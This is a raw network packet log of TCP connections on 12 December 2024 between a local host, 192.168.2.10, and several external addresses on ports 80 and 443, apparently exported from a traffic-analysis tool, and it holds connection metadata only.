                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.582266092 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.582923889 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.583029985 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.583044052 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.583331108 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.584026098 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.584145069 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.584184885 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.584184885 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.585398912 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.585454941 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.585524082 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.585597992 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.586431026 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.586471081 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.586529016 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.586565971 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.587608099 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.587694883 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.587752104 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.587852001 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.588787079 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.588855982 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.588886023 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.588939905 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.589984894 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.590051889 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.590075016 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.590358019 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.591118097 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.591171980 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.591228962 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.591326952 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.592291117 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.592410088 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.592427969 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.592587948 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.593664885 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.593799114 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.593838930 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.593838930 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.594762087 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.594855070 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.594918966 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.594918966 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.595911026 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.595957041 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.596175909 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:12.596175909 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:14.775909901 CET4985680192.168.2.10185.215.113.43
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:14.776274920 CET4986880192.168.2.10185.215.113.43
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:14.896076918 CET8049868185.215.113.43192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:14.896120071 CET8049856185.215.113.43192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:14.896282911 CET4985680192.168.2.10185.215.113.43
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:14.896310091 CET4986880192.168.2.10185.215.113.43
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:14.896534920 CET4986880192.168.2.10185.215.113.43
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:15.016345978 CET8049868185.215.113.43192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:15.392710924 CET49870443192.168.2.10216.58.208.238
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:15.392735004 CET44349870216.58.208.238192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:15.392992020 CET49870443192.168.2.10216.58.208.238
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:15.405958891 CET49870443192.168.2.10216.58.208.238
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:15.405985117 CET44349870216.58.208.238192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:16.236272097 CET8049868185.215.113.43192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:16.237759113 CET4986880192.168.2.10185.215.113.43
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:16.264858961 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:16.264992952 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:16.384934902 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:16.385540009 CET804985831.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:16.386100054 CET4985880192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:16.387531042 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:16.415262938 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:16.535604000 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:16.953129053 CET49875443192.168.2.10216.58.208.238
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:16.953181982 CET44349875216.58.208.238192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:16.954195023 CET49875443192.168.2.10216.58.208.238
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:16.966945887 CET49875443192.168.2.10216.58.208.238
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:16.966964960 CET44349875216.58.208.238192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.112519979 CET44349870216.58.208.238192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.112615108 CET49870443192.168.2.10216.58.208.238
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.113310099 CET44349870216.58.208.238192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.113368988 CET49870443192.168.2.10216.58.208.238
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.174036026 CET49870443192.168.2.10216.58.208.238
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.174062014 CET44349870216.58.208.238192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.174360037 CET44349870216.58.208.238192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.174413919 CET49870443192.168.2.10216.58.208.238
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.175831079 CET49870443192.168.2.10216.58.208.238
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.219343901 CET44349870216.58.208.238192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.714489937 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.714499950 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.714508057 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.714551926 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.714585066 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.714623928 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.714706898 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.714719057 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.714720011 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.714731932 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.714735031 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.714765072 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.714812994 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.714824915 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.714835882 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.714850903 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.714874983 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.834417105 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.834484100 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.834527969 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.834569931 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.838675022 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.838749886 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.908431053 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.908524036 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.908545971 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.908598900 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.911542892 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.911606073 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.911657095 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.911698103 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.920001030 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.920053005 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.920104980 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.920141935 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.928369999 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.928426027 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.928428888 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.928464890 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.936839104 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.936937094 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.936992884 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.937041998 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.945277929 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.945346117 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.945373058 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.945420980 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.953670979 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.953725100 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.953835011 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.953874111 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.962114096 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.962167978 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.962234974 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.962279081 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.970525980 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.970630884 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.970700979 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.978869915 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.979010105 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.979065895 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.988167048 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.988291025 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:17.988348961 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.021194935 CET44349870216.58.208.238192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.023601055 CET49870443192.168.2.10216.58.208.238
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.023641109 CET44349870216.58.208.238192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.023683071 CET49870443192.168.2.10216.58.208.238
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.023802042 CET49870443192.168.2.10216.58.208.238
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.023852110 CET44349870216.58.208.238192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.023998976 CET44349870216.58.208.238192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.024051905 CET49870443192.168.2.10216.58.208.238
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.024075985 CET49870443192.168.2.10216.58.208.238
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.029113054 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.029136896 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.029212952 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.099179029 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.099355936 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.099486113 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.101598978 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.101667881 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.101676941 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.101722956 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.106630087 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.106722116 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.106802940 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.111350060 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.111569881 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.111584902 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.111640930 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.116256952 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.116277933 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.116326094 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.120969057 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.121083975 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.121146917 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.125688076 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.125782967 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.125833035 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.130496025 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.130605936 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.130652905 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.135345936 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.135524035 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.135576963 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.135621071 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.140146017 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.140345097 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.140405893 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.144869089 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.144999027 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.145051003 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.149554968 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.149676085 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.149729013 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.154474020 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.154702902 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.154756069 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.159265041 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.159352064 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.159404039 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.162885904 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.163033962 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.163042068 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.163084030 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.166579962 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.166651964 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.166672945 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.166692019 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.166718006 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.166785002 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.167090893 CET49878443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.167104959 CET44349878172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.170291901 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.170424938 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.170485973 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.291481972 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.291594982 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.291707039 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.292962074 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.293025970 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.293066025 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.293107033 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.295866966 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.295927048 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.295990944 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.296040058 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.298738956 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.298814058 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.298868895 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.298918962 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.301691055 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.301738977 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.301795006 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.301836967 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.304744959 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.304764032 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.304828882 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.307538986 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.307590008 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.307626963 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.307683945 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.310489893 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.310532093 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.310704947 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.311561108 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.313308954 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.313360929 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.313420057 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.313462973 CET4987280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.316214085 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.316320896 CET804987231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:18.316366911 CET4987280192.168.2.1031.41.244.11
